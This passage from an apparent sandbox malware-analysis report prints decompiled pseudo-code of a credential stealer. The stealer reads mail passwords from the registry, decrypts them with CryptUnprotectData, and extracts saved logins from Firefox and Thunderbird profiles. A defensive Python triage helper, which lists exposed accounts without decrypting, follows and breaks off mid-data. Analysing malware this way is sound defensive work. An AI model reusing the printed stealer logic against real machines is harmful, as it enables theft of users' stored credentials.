                                  • RegQueryValueExW.ADVAPI32(?,Account Name,00000000,00000000,?,00001000,?,?,?,?,?,74A345DD,767130EA,00000000,?,004099C3), ref: 00409A81
                                  • RegQueryValueExW.ADVAPI32(?,Email,00000000,00000000,?,00001000,?,?,?,?,?,?,?,?,74A345DD,767130EA), ref: 00409AC8
                                  • RegQueryValueExW.ADVAPI32(?,POP3 Server,00000000,00000000,?,00001000), ref: 00409B0C
                                  • RegQueryValueExW.ADVAPI32(?,POP3 User,00000000,00000000,?,00001000), ref: 00409B50
                                  • RegQueryValueExW.ADVAPI32(?,SMTP Server,00000000,00000000,?,00001000), ref: 00409B94
                                  • RegQueryValueExW.ADVAPI32(?,POP3 Password,00000000,00000000,?,00001000), ref: 00409BD8
                                  • RegQueryValueExW.ADVAPI32(?,SMTP Password,00000000,00000000,?,00001000), ref: 00409C45
                                  • RegQueryValueExW.ADVAPI32(?,HTTP Password,00000000,00000000,?,00001000), ref: 00409CB2
                                  • RegQueryValueExW.ADVAPI32(?,IMAP Password,00000000,00000000,?,00001000), ref: 00409D1F
                                    • Part of subcall function 00409D97: GlobalAlloc.KERNEL32(00000040,-00000001,74A345FD,?,?,?,00409D4B,00001000,?,00000000,00001000), ref: 00409DB5
                                    • Part of subcall function 00409D97: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,00409D4B), ref: 00409DEB
                                    • Part of subcall function 00409D97: lstrcpyW.KERNEL32(?,Could not decrypt), ref: 00409E22
                                    • Part of subcall function 00403373: lstrlenW.KERNEL32(74A313FB,00403758,?,?,?,00412AE3,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?VA,00000000,74A313FB,00000000), ref: 0040337A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: QueryValue$AllocCryptDataGlobalUnprotectlstrcpylstrlen
                                  • String ID: Account Name$Email$HTTP Password$IMAP Password$POP3 Password$POP3 Server$POP3 User$SMTP Password$SMTP Server
                                  • API String ID: 6593746-2537589853
                                  • Opcode ID: cc5f769d671623cbfaa9f0c516c5158cd819fe66edd51a48f4d1e9d80896eb4f
                                  • Instruction ID: 7120254dbc2b6b4f3800d12c0dea7aeb6369d048fca86938223c4741ea706cc6
                                  • Opcode Fuzzy Hash: cc5f769d671623cbfaa9f0c516c5158cd819fe66edd51a48f4d1e9d80896eb4f
                                  • Instruction Fuzzy Hash: FFA11EB291011DAADB25EB91CD45FEF737CAF54744F1000BAF605F61C1EA78AB448BA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 95%
                                  			E0040A36F(intOrPtr __ecx, void* __eflags, char _a4) {
                                  				int _v12;
                                  				int _v16;
                                  				WCHAR* _v20;
                                  				WCHAR* _v24;
                                  				char _v28;
                                  				intOrPtr _v32;
                                  				WCHAR* _v36;
                                  				char _v40;
                                  				char _v44;
                                  				int _v48;
                                  				int _v52;
                                  				int _v56;
                                  				char _v60;
                                  				char _v64;
                                  				char _v68;
                                  				char _v72;
                                  				char _v76;
                                  				char _v80;
                                  				char _v84;
                                  				char _v88;
                                  				long _v92;
                                  				int _v96;
                                  				intOrPtr _v100;
                                  				char _v104;
                                  				char _v108;
                                  				char _v112;
                                  				void* _v116;
                                  				int _v120;
                                  				char _v124;
                                  				char _v128;
                                  				char _v132;
                                  				char _v136;
                                  				char _v140;
                                  				char _v144;
                                  				char _v148;
                                  				char _v152;
                                  				int _v156;
                                  				char _v160;
                                  				intOrPtr _v164;
                                  				char _v180;
                                  				char _v184;
                                  				short _v704;
                                  				short _v1224;
                                  				char* _t165;
                                  				void* _t167;
                                  				int _t189;
                                  				int _t190;
                                  				int _t193;
                                  				int _t207;
                                  				WCHAR* _t215;
                                  				void* _t217;
                                  				int _t221;
                                  				void* _t230;
                                  				void* _t236;
                                  				void* _t242;
                                  				int _t281;
                                  				int _t283;
                                  				char* _t293;
                                  				char* _t325;
                                  				void* _t386;
                                  				long _t389;
                                  				intOrPtr _t391;
                                  				intOrPtr _t392;
                                  				WCHAR* _t393;
                                  				int _t394;
                                  				void* _t395;
                                  				void* _t396;
                                  				void* _t397;
                                  
                                  				_t397 = __eflags;
                                  				_t392 = __ecx;
                                  				_v32 = __ecx;
                                  				E004036F7( &_v24, L"Profile");
                                  				_t281 = 0;
                                  				E00401052( &_v1224, 0, 0x208);
                                  				_t396 = _t395 + 0xc;
                                  				_v92 = 0;
                                  				_t389 = 0;
                                  				E00401052( &_v704, 0, 0x104);
                                  				_t385 =  &_v704;
                                  				if(E0040B87D(L"firefox.exe",  &_v704, _t397) != 0) {
                                  					_t293 =  &_v44;
                                  					E004036F7(_t293,  &_v704);
                                  					lstrcatW( &_v704, L"\\firefox.exe");
                                  					GetBinaryTypeW( &_v704,  &_v92);
                                  					_t399 = _v92 - 6;
                                  					_t165 =  &_v44;
                                  					if(_v92 != 6) {
                                  						_push(0);
                                  					} else {
                                  						_push(1);
                                  					}
                                  					_push(_t293);
                                  					E0040373F(_t396, _t165);
                                  					_t167 = E0040B165(_t392, _t385, _t399);
                                  					_t400 = _t167;
                                  					if(_t167 != 0) {
                                  						E0040357C( &_a4, _t385, _t400, L"\\Mozilla\\Firefox\\");
                                  						E0040373F( &_v36,  &_a4);
                                  						E0040357C( &_v36, _t385, _t400, L"profiles.ini");
                                  						E00403549( &_v24, E004036F7( &_v40, L"Profile"));
                                  						E00405FEB(_v40);
                                  						E00403384( &_v24, _t385, _t400, _t281);
                                  						while(GetPrivateProfileStringW(_v24, L"Path", _t281,  &_v1224, 0x104, _v36) != 0) {
                                  							_t389 = _t389 + 1;
                                  							_v40 = _t389;
                                  							E00403549( &_v24, E004036F7( &_v96, L"Profile"));
                                  							E00405FEB(_v96);
                                  							_v96 = _t281;
                                  							E00403384( &_v24, _t385, __eflags, _t389);
                                  							E0040373F( &_v12,  &_a4);
                                  							E0040357C( &_v12, _t385, __eflags,  &_v1224);
                                  							E00403666( &_v12,  &_v28);
                                  							_t189 =  *((intOrPtr*)(_t392 + 0x68))(_v28);
                                  							__eflags = _t189;
                                  							if(_t189 == 0) {
                                  								_t190 =  *((intOrPtr*)(_t392 + 0x80))();
                                  								_v156 = _t190;
                                  								__eflags = _t190;
                                  								if(_t190 == 0) {
                                  									goto L7;
                                  								} else {
                                  									_t193 =  *((intOrPtr*)(_t392 + 0x7c))(_t190, 1, _t281);
                                  									_t396 = _t396 + 0xc;
                                  									__eflags = _t193;
                                  									if(_t193 != 0) {
                                  										goto L7;
                                  									} else {
                                  										E0040373F( &_v20,  &_v12);
                                  										E0040357C( &_v20, _t385, __eflags, L"\\logins.json");
                                  										_t386 = 0x1a;
                                  										E00410C8A( &_v16, _t386, __eflags);
                                  										E0040357C( &_v16, _t386, __eflags, "\\");
                                  										_t385 = 8;
                                  										E00403447( &_v16, __eflags, E004035B9( &_v56, _t385, __eflags));
                                  										E00405FEB(_v56);
                                  										_v56 = _t281;
                                  										E0040357C( &_v16, _t385, __eflags, L".tmp");
                                  										_t393 = _v16;
                                  										_t390 = _v20;
                                  										__eflags = CopyFileW(_v20, _t393, _t281);
                                  										if(__eflags != 0) {
                                  											E00403549( &_v20,  &_v16);
                                  											_t390 = _v20;
                                  										}
                                  										E004113ED( &_v184, __eflags);
                                  										_t325 =  &_v180;
                                  										E00403549(_t325,  &_v20);
                                  										_push(_t325);
                                  										_t207 = E004116B1( &_v184, 0xc0000000);
                                  										_t327 =  &_v184;
                                  										__eflags = _t207;
                                  										if(__eflags != 0) {
                                  											_v52 = _t281;
                                  											_v48 = _t281;
                                  											E0041135C( &_v184, _t385,  &_v52, _v164, _t281);
                                  											_t215 = E004034D1( &_v116, "encryptedUsername");
                                  											_t217 = E0040305D( &_v52,  &_v160);
                                  											_t385 = _t215;
                                  											_t283 = E0040961C(_t217, _t215, __eflags);
                                  											_v120 = _t283;
                                  											E00405FEB(_v160);
                                  											_t336 = _v116;
                                  											E00405FEB(_v116);
                                  											__eflags = _t283;
                                  											if(_t283 == 0) {
                                  												_t281 = 0;
                                  												__eflags = 0;
                                  											} else {
                                  												_t391 = _v32;
                                  												_t281 = 0;
                                  												__eflags = 0;
                                  												_t394 = _v120;
                                  												do {
                                  													_v112 = 0;
                                  													_v108 = 0;
                                  													_v104 = 0;
                                  													_t230 = E004034D1( &_v128, "hostname");
                                  													E00409655( &_v88, E0040305D( &_v52,  &_v124), __eflags, _t230, _t394);
                                  													E00405FEB(_v124);
                                  													E00405FEB(_v128);
                                  													_t236 = E004034D1( &_v136, "encryptedUsername");
                                  													E00409655( &_v84, E0040305D( &_v52,  &_v132), __eflags, _t236, _t394);
                                  													E00405FEB(_v132);
                                  													E00405FEB(_v136);
                                  													_t242 = E004034D1( &_v144, "encryptedPassword");
                                  													_t385 = E0040305D( &_v52,  &_v140);
                                  													E00409655( &_v80, _t244, __eflags, _t242, _t394);
                                  													E00405FEB(_v140);
                                  													E00405FEB(_v144);
                                  													E0040A8C3(_t391, __eflags, _v84,  &_v72);
                                  													E0040A8C3(_t391, __eflags, _v80,  &_v76);
                                  													E00403549( &_v112, E004031AF( &_v88, __eflags,  &_v60));
                                  													E00405FEB(_v60);
                                  													_v60 = 0;
                                  													E00403549( &_v108, E004031AF(E004034D1( &_v148, _v72), __eflags,  &_v64));
                                  													E00405FEB(_v64);
                                  													_v64 = 0;
                                  													E00405FEB(_v148);
                                  													E00403549( &_v104, E004031AF(E004034D1( &_v152, _v76), __eflags,  &_v68));
                                  													E00405FEB(_v68);
                                  													_v68 = 0;
                                  													E00405FEB(_v152);
                                  													_t396 = _t396 - 0x10;
                                  													_v100 = 0;
                                  													E00401FF2(_t396,  &_v112);
                                  													E00402028(_t391);
                                  													E00405FEB(_v72);
                                  													E00405FEB(_v76);
                                  													E00405FEB(_v80);
                                  													E00405FEB(_v84);
                                  													E00405FEB(_v88);
                                  													_t336 =  &_v112;
                                  													E00401441( &_v112);
                                  													_t394 = _t394 - 1;
                                  													__eflags = _t394;
                                  												} while (_t394 != 0);
                                  												_t393 = _v16;
                                  												_t390 = _v20;
                                  											}
                                  											_t221 = PathFileExistsW(_t393);
                                  											__eflags = _t221;
                                  											if(_t221 != 0) {
                                  												E0040373F(_t396,  &_v16);
                                  												E0041142A(_t336);
                                  											}
                                  											 *((intOrPtr*)(_v32 + 0x84))(_v156);
                                  											 *((intOrPtr*)(_v32 + 0x6c))();
                                  											E00403148( &_v52);
                                  											_t327 =  &_v184;
                                  										}
                                  										E0041140C(_t327, __eflags);
                                  										E00405FEB(_t393);
                                  										_v16 = _t281;
                                  										E00405FEB(_t390);
                                  										_v20 = _t281;
                                  										E00405FEB(_v28);
                                  										E00405FEB(_v12);
                                  										_t389 = _v40;
                                  										_t392 = _v32;
                                  									}
                                  								}
                                  							} else {
                                  								L7:
                                  								E00405FEB(_v28);
                                  								E00405FEB(_v12);
                                  							}
                                  							_v12 = _t281;
                                  						}
                                  						E0040B10E(_t392);
                                  						_t281 = 1;
                                  						E00405FEB(_v36);
                                  					}
                                  					E00405FEB(_v44);
                                  				}
                                  				E00405FEB(_v24);
                                  				E00405FEB(_a4);
                                  				return _t281;
                                  			}

                                  APIs
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                    • Part of subcall function 0040B87D: lstrcpyW.KERNEL32(?,Software\Microsoft\Windows\CurrentVersion\App Paths\), ref: 0040B8B9
                                    • Part of subcall function 0040B87D: lstrcatW.KERNEL32 ref: 0040B8C7
                                    • Part of subcall function 0040B87D: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00409E8E,?,00000104,00000000), ref: 0040B8E0
                                    • Part of subcall function 0040B87D: RegQueryValueExW.ADVAPI32(00409E8E,Path,00000000,?,?,?,?,00000104,00000000), ref: 0040B8FD
                                    • Part of subcall function 0040B87D: RegCloseKey.ADVAPI32(00409E8E,?,00000104,00000000), ref: 0040B906
                                  • lstrcatW.KERNEL32 ref: 0040A3F1
                                  • GetBinaryTypeW.KERNEL32 ref: 0040A402
                                  • GetPrivateProfileStringW.KERNEL32(?,Path,00000000,?,00000104,?), ref: 0040A882
                                    • Part of subcall function 00403549: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040356E
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                    • Part of subcall function 00403384: wsprintfW.USER32 ref: 0040339F
                                    • Part of subcall function 0040373F: lstrcpyW.KERNEL32(00000000,74A313FB), ref: 00403769
                                    • Part of subcall function 00403666: WideCharToMultiByte.KERNEL32(00000000,00000200,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00404FB1,?), ref: 00403693
                                    • Part of subcall function 00403666: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00404FB1,?,?,?,?,?,00000000), ref: 004036BE
                                  • CopyFileW.KERNEL32(?,?,00000000), ref: 0040A579
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$ByteCharMultiWidelstrcatlstrlen$BinaryCloseCopyFileFreeOpenPrivateProfileQueryStringTypeValueVirtualwsprintf
                                  • String ID: .tmp$Path$Profile$\Mozilla\Firefox\$\firefox.exe$\logins.json$encryptedPassword$encryptedUsername$firefox.exe$hostname$profiles.ini
                                  • API String ID: 288196626-815594582
                                  • Opcode ID: df8e03526ba9115c8cbe24748b02de1b57c24dd5a863437d0d80fd3bf3700f3c
                                  • Instruction ID: f77f0e27933f91ead54b6ecb8e2b1fb8a7b853b941c5058b019390cbb6b3834b
                                  • Opcode Fuzzy Hash: df8e03526ba9115c8cbe24748b02de1b57c24dd5a863437d0d80fd3bf3700f3c
                                  • Instruction Fuzzy Hash: 7EE1D571900219ABDB14EBA2DC92DEEBB79AF54308F10407FF506771D2DE386A45CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 94%
                                  			E00409E2D(intOrPtr __ecx, void* __eflags, char _a4) {
                                  				int _v12;
                                  				int _v16;
                                  				WCHAR* _v20;
                                  				WCHAR* _v24;
                                  				char _v28;
                                  				intOrPtr _v32;
                                  				char _v36;
                                  				char _v40;
                                  				char _v44;
                                  				int _v48;
                                  				int _v52;
                                  				long _v56;
                                  				int _v60;
                                  				int _v64;
                                  				char _v68;
                                  				char _v72;
                                  				char _v76;
                                  				char _v80;
                                  				char _v84;
                                  				intOrPtr _v88;
                                  				char _v92;
                                  				char _v96;
                                  				char _v100;
                                  				void* _v104;
                                  				int _v108;
                                  				char _v112;
                                  				char _v116;
                                  				char _v120;
                                  				char _v124;
                                  				char _v128;
                                  				char _v132;
                                  				char _v136;
                                  				char _v140;
                                  				char _v144;
                                  				char _v148;
                                  				int _v152;
                                  				long _v156;
                                  				char _v160;
                                  				intOrPtr _v164;
                                  				char _v180;
                                  				char _v184;
                                  				short _v704;
                                  				short _v1224;
                                  				long _t171;
                                  				int _t182;
                                  				int _t183;
                                  				int _t186;
                                  				int _t200;
                                  				WCHAR* _t208;
                                  				void* _t210;
                                  				int _t214;
                                  				void* _t223;
                                  				void* _t229;
                                  				void* _t235;
                                  				int _t279;
                                  				int _t281;
                                  				char* _t321;
                                  				void* _t382;
                                  				intOrPtr _t385;
                                  				intOrPtr _t387;
                                  				WCHAR* _t392;
                                  				int _t393;
                                  				void* _t394;
                                  				void* _t395;
                                  				void* _t396;
                                  
                                  				_t396 = __eflags;
                                  				_t385 = __ecx;
                                  				_v32 = __ecx;
                                  				E004036F7( &_v24, L"Profile");
                                  				_t279 = 0;
                                  				E00401052( &_v1224, 0, 0x208);
                                  				_v56 = 0;
                                  				_v156 = 0;
                                  				E00401052( &_v704, 0, 0x104);
                                  				_t395 = _t394 + 0x14;
                                  				_t381 =  &_v704;
                                  				E0040B87D(L"thunderbird.exe",  &_v704, _t396);
                                  				E004036F7( &_v44,  &_v704);
                                  				GetBinaryTypeW( &_v704,  &_v156);
                                  				E0040373F(_t395,  &_v44);
                                  				_t289 = _t385;
                                  				if(E0040ADE3(_t385,  &_v704,  &_v44) != 0) {
                                  					L3:
                                  					E0040357C( &_a4, _t381, __eflags, L"\\Thunderbird\\");
                                  					E0040373F( &_v36,  &_a4);
                                  					E0040357C( &_v36, _t381, __eflags, L"profiles.ini");
                                  					E00403549( &_v24, E004036F7( &_v40, L"Profile"));
                                  					E00405FEB(_v40);
                                  					E00403384( &_v24, _t381, __eflags, _t279);
                                  					_push(_v36);
                                  					_push(0x104);
                                  					while(1) {
                                  						_t389 = _v24;
                                  						_t171 = GetPrivateProfileStringW(_v24, L"Path", _t279,  &_v1224, ??, ??);
                                  						__eflags = _t171;
                                  						if(_t171 == 0) {
                                  							break;
                                  						}
                                  						_v56 = _v56 + 1;
                                  						E00403549( &_v24, E004036F7( &_v60, L"Profile"));
                                  						E00405FEB(_v60);
                                  						_v60 = _t279;
                                  						E00403384( &_v24, _t381, __eflags, _v56 + 1);
                                  						E0040373F( &_v12,  &_a4);
                                  						E0040357C( &_v12, _t381, __eflags,  &_v1224);
                                  						E00403666( &_v12,  &_v28);
                                  						_t182 =  *((intOrPtr*)(_t385 + 0x68))(_v28);
                                  						__eflags = _t182;
                                  						if(_t182 == 0) {
                                  							_t183 =  *((intOrPtr*)(_t385 + 0x80))();
                                  							_v152 = _t183;
                                  							__eflags = _t183;
                                  							if(_t183 == 0) {
                                  								goto L5;
                                  							} else {
                                  								_t186 =  *((intOrPtr*)(_t385 + 0x7c))(_t183, 1, _t279);
                                  								_t395 = _t395 + 0xc;
                                  								__eflags = _t186;
                                  								if(_t186 != 0) {
                                  									goto L5;
                                  								} else {
                                  									E0040373F( &_v20,  &_v12);
                                  									E0040357C( &_v20, _t381, __eflags, L"\\logins.json");
                                  									_t382 = 0x1a;
                                  									E00410C8A( &_v16, _t382, __eflags);
                                  									E0040357C( &_v16, _t382, __eflags, "\\");
                                  									_t381 = 8;
                                  									E00403447( &_v16, __eflags, E004035B9( &_v64, _t381, __eflags));
                                  									E00405FEB(_v64);
                                  									_v64 = _t279;
                                  									E0040357C( &_v16, _t381, __eflags, L".tmp");
                                  									_t392 = _v16;
                                  									_t386 = _v20;
                                  									__eflags = CopyFileW(_v20, _t392, _t279);
                                  									if(__eflags != 0) {
                                  										E00403549( &_v20,  &_v16);
                                  										_t386 = _v20;
                                  									}
                                  									E004113ED( &_v184, __eflags);
                                  									_t321 =  &_v180;
                                  									E00403549(_t321,  &_v20);
                                  									_push(_t321);
                                  									_t200 = E004116B1( &_v184, 0xc0000000);
                                  									_t323 =  &_v184;
                                  									__eflags = _t200;
                                  									if(__eflags != 0) {
                                  										_v52 = _t279;
                                  										_v48 = _t279;
                                  										E0041135C( &_v184, _t381,  &_v52, _v164, _t279);
                                  										_t208 = E004034D1( &_v104, "encryptedUsername");
                                  										_t210 = E0040305D( &_v52,  &_v160);
                                  										_t381 = _t208;
                                  										_t281 = E0040961C(_t210, _t208, __eflags);
                                  										_v108 = _t281;
                                  										E00405FEB(_v160);
                                  										_t332 = _v104;
                                  										E00405FEB(_v104);
                                  										__eflags = _t281;
                                  										if(_t281 == 0) {
                                  											_t279 = 0;
                                  											__eflags = 0;
                                  										} else {
                                  											_t387 = _v32;
                                  											_t279 = 0;
                                  											__eflags = 0;
                                  											_t393 = _v108;
                                  											do {
                                  												_v100 = 0;
                                  												_v96 = 0;
                                  												_v92 = 0;
                                  												_t223 = E004034D1( &_v116, "hostname");
                                  												E00409655( &_v40, E0040305D( &_v52,  &_v112), __eflags, _t223, _t393);
                                  												E00405FEB(_v112);
                                  												E00405FEB(_v116);
                                  												_t229 = E004034D1( &_v124, "encryptedUsername");
                                  												E00409655( &_v84, E0040305D( &_v52,  &_v120), __eflags, _t229, _t393);
                                  												E00405FEB(_v120);
                                  												E00405FEB(_v124);
                                  												_t235 = E004034D1( &_v132, "encryptedPassword");
                                  												_t381 = E0040305D( &_v52,  &_v128);
                                  												E00409655( &_v80, _t237, __eflags, _t235, _t393);
                                  												E00405FEB(_v128);
                                  												E00405FEB(_v132);
                                  												E0040A8C3(_t387, __eflags, _v84,  &_v136);
                                  												E0040A8C3(_t387, __eflags, _v80,  &_v144);
                                  												E00403549( &_v100, E004031AF( &_v40, __eflags,  &_v68));
                                  												E00405FEB(_v68);
                                  												_v68 = 0;
                                  												E00403549( &_v96, E004031AF(E004034D1( &_v140, _v136), __eflags,  &_v72));
                                  												E00405FEB(_v72);
                                  												_v72 = 0;
                                  												E00405FEB(_v140);
                                  												E00403549( &_v92, E004031AF(E004034D1( &_v148, _v144), __eflags,  &_v76));
                                  												E00405FEB(_v76);
                                  												_v76 = 0;
                                  												E00405FEB(_v148);
                                  												_t395 = _t395 - 0x10;
                                  												_v88 = 4;
                                  												E00401FF2(_t395,  &_v100);
                                  												E00402028(_t387);
                                  												E00405FEB(_v80);
                                  												E00405FEB(_v84);
                                  												E00405FEB(_v40);
                                  												_t332 =  &_v100;
                                  												E00401441( &_v100);
                                  												_t393 = _t393 - 1;
                                  												__eflags = _t393;
                                  											} while (_t393 != 0);
                                  											_t392 = _v16;
                                  											_t386 = _v20;
                                  										}
                                  										_t214 = PathFileExistsW(_t392);
                                  										__eflags = _t214;
                                  										if(_t214 != 0) {
                                  											E0040373F(_t395,  &_v16);
                                  											E0041142A(_t332);
                                  										}
                                  										 *((intOrPtr*)(_v32 + 0x84))(_v152);
                                  										 *((intOrPtr*)(_v32 + 0x6c))();
                                  										E00403148( &_v52);
                                  										_t323 =  &_v184;
                                  									}
                                  									E0041140C(_t323, __eflags);
                                  									E00405FEB(_t392);
                                  									_v16 = _t279;
                                  									E00405FEB(_t386);
                                  									_v20 = _t279;
                                  									E00405FEB(_v28);
                                  									E00405FEB(_v12);
                                  									_t385 = _v32;
                                  								}
                                  							}
                                  						} else {
                                  							L5:
                                  							E00405FEB(_v28);
                                  							E00405FEB(_v12);
                                  						}
                                  						_push(_v36);
                                  						_v12 = _t279;
                                  						_push(0x104);
                                  					}
                                  					E0040AD8C(_t385);
                                  					_t279 = 1;
                                  					__eflags = 1;
                                  					E00405FEB(_v36);
                                  				} else {
                                  					E0040373F(_t395,  &_v44);
                                  					if(E0040ADE3(_t385,  &_v704, _t289) != 0) {
                                  						goto L3;
                                  					} else {
                                  						_t389 = _v24;
                                  					}
                                  				}
                                  				E00405FEB(_v44);
                                  				E00405FEB(_t389);
                                  				E00405FEB(_a4);
                                  				return _t279;
                                  			}

                                  APIs
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                    • Part of subcall function 0040B87D: lstrcpyW.KERNEL32(?,Software\Microsoft\Windows\CurrentVersion\App Paths\), ref: 0040B8B9
                                    • Part of subcall function 0040B87D: lstrcatW.KERNEL32 ref: 0040B8C7
                                    • Part of subcall function 0040B87D: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00409E8E,?,00000104,00000000), ref: 0040B8E0
                                    • Part of subcall function 0040B87D: RegQueryValueExW.ADVAPI32(00409E8E,Path,00000000,?,?,?,?,00000104,00000000), ref: 0040B8FD
                                    • Part of subcall function 0040B87D: RegCloseKey.ADVAPI32(00409E8E,?,00000104,00000000), ref: 0040B906
                                  • GetBinaryTypeW.KERNEL32 ref: 00409EAC
                                    • Part of subcall function 0040373F: lstrcpyW.KERNEL32(00000000,74A313FB), ref: 00403769
                                    • Part of subcall function 0040ADE3: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00000104,00000000), ref: 0040AE11
                                    • Part of subcall function 0040ADE3: SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 0040AE1A
                                    • Part of subcall function 0040ADE3: PathFileExistsW.SHLWAPI(00409EC5), ref: 0040AF08
                                  • GetPrivateProfileStringW.KERNEL32(?,Path,00000000,?,00000104,?), ref: 0040A32F
                                    • Part of subcall function 0040ADE3: PathFileExistsW.SHLWAPI(00409EC5), ref: 0040AF64
                                    • Part of subcall function 0040ADE3: LoadLibraryW.KERNEL32(?,00409EC5,?,00000104,00000000), ref: 0040AFA3
                                    • Part of subcall function 0040ADE3: LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040AFAE
                                    • Part of subcall function 0040ADE3: LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040AFB9
                                    • Part of subcall function 0040ADE3: LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040AFC4
                                    • Part of subcall function 0040ADE3: LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040AFCF
                                    • Part of subcall function 0040ADE3: SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 0040B0BC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: LibraryLoad$CurrentDirectorylstrcpy$ExistsFilePathlstrlen$BinaryCloseOpenPrivateProfileQueryStringTypeValuelstrcat
                                  • String ID: .tmp$Path$Profile$\Thunderbird\$\logins.json$encryptedPassword$encryptedUsername$hostname$profiles.ini$thunderbird.exe
                                  • API String ID: 1065485167-1863067114
                                  • Opcode ID: f9e4d497a1a47c80fd96d8cbd3d63b1e460b11bbe56d18463cbdbc57bb97d7b2
                                  • Instruction ID: fb365c449ce7900d484e2c61c5ec7aa39d660c5b142231a0d8c8c55fb7191f8b
                                  • Opcode Fuzzy Hash: f9e4d497a1a47c80fd96d8cbd3d63b1e460b11bbe56d18463cbdbc57bb97d7b2
                                  • Instruction Fuzzy Hash: CDE1D671900219ABCB15EBA2DC92DEEBB79AF54308F10407EF506772D2DE386E45CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%
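The routine above is the sample's Thunderbird credential collector. The String IDs `\Thunderbird\`, `profiles.ini`, `Profile`, `Path` and `\logins.json`, together with the GetPrivateProfileStringW(?, Path, ...) call, show it resolving the profile directory from `profiles.ini`; it then copies `logins.json` to a `.tmp` file (CopyFileW), appears to derive its loop count from the `encryptedUsername` key (_v108/_t393), pulls `hostname`, `encryptedUsername` and `encryptedPassword` from each record, and after a PathFileExistsW check on the `.tmp` path calls E0041142A, presumably to remove the copy. The subcall at 0040ADE3, which locates `thunderbird.exe` through the `App Paths` registry key and then issues five LoadLibraryW calls, is where the decryption side lives; the listing does not name those libraries. For incident response the practical question is which accounts this reached. The Python below is an added example, not code from the report or the sample: it repeats only the file-discovery part (the `Path` entry of each `[ProfileN]` section, plus `IsRelative`, which the profiles.ini format uses but the listing does not show, then the `logins` array of logins.json, the Mozilla format these three key names come from) and reports hostnames plus whether an encrypted username or password blob exists, without touching NSS or decrypting anything. The profile it writes into a temporary directory is constructed sample data.

```python
"""Triage helper: which Thunderbird accounts could the stealer above have read?

Added example, not code from the report or the sample. It repeats only the
file-discovery steps of the decompiled routine (profiles.ini -> Path ->
logins.json -> hostname / encryptedUsername / encryptedPassword) and never
decrypts anything; the NSS-side work the sample does is deliberately absent.
"""
import configparser
import json
import tempfile
from pathlib import Path
from typing import Dict, List


def profile_dirs(profiles_ini: Path) -> List[Path]:
    """Resolve the Path= entry of every [ProfileN] section to a directory.

    This is the lookup the sample does with GetPrivateProfileStringW(section, "Path", ...).
    IsRelative=1 (the format's default) makes Path relative to the profiles.ini folder.
    """
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str            # keep "Path" / "IsRelative" case as written
    cp.read(profiles_ini, encoding="utf-8")
    found: List[Path] = []
    for section in cp.sections():
        if not section.startswith("Profile") or "Path" not in cp[section]:
            continue
        raw = cp[section]["Path"]
        relative = cp[section].get("IsRelative", "1") == "1"
        found.append(((profiles_ini.parent / raw) if relative else Path(raw)).resolve())
    return found


def exposed_logins(profile_dir: Path) -> List[Dict[str, object]]:
    """One record per entry in <profile>/logins.json, limited to the three keys
    the decompiled loop reads. The encrypted* values are NSS blobs; only their
    presence is reported, never their contents."""
    logins_json = profile_dir / "logins.json"
    if not logins_json.is_file():
        return []
    with logins_json.open(encoding="utf-8") as fh:
        data = json.load(fh)
    records: List[Dict[str, object]] = []
    for entry in data.get("logins", []):     # "logins" is the array name in the Mozilla format
        records.append({
            "hostname": entry.get("hostname", ""),
            "has_encryptedUsername": bool(entry.get("encryptedUsername")),
            "has_encryptedPassword": bool(entry.get("encryptedPassword")),
        })
    return records


def triage(thunderbird_root: Path) -> Dict[str, List[Dict[str, object]]]:
    """Map each profile directory named in <root>/profiles.ini to its exposed logins."""
    ini = thunderbird_root / "profiles.ini"
    if not ini.is_file():
        return {}
    return {str(d): exposed_logins(d) for d in profile_dirs(ini)}


# ---- constructed sample profile (not data from the analysed machine) ----
SAMPLE_PROFILES_INI = """[General]
StartWithLastProfile=1

[Profile0]
Name=default
IsRelative=1
Path=Profiles/ab12cd34.default
Default=1
"""

SAMPLE_LOGINS_JSON = {
    "nextId": 3,
    "logins": [
        {"id": 1, "hostname": "imap://mail.example.com",
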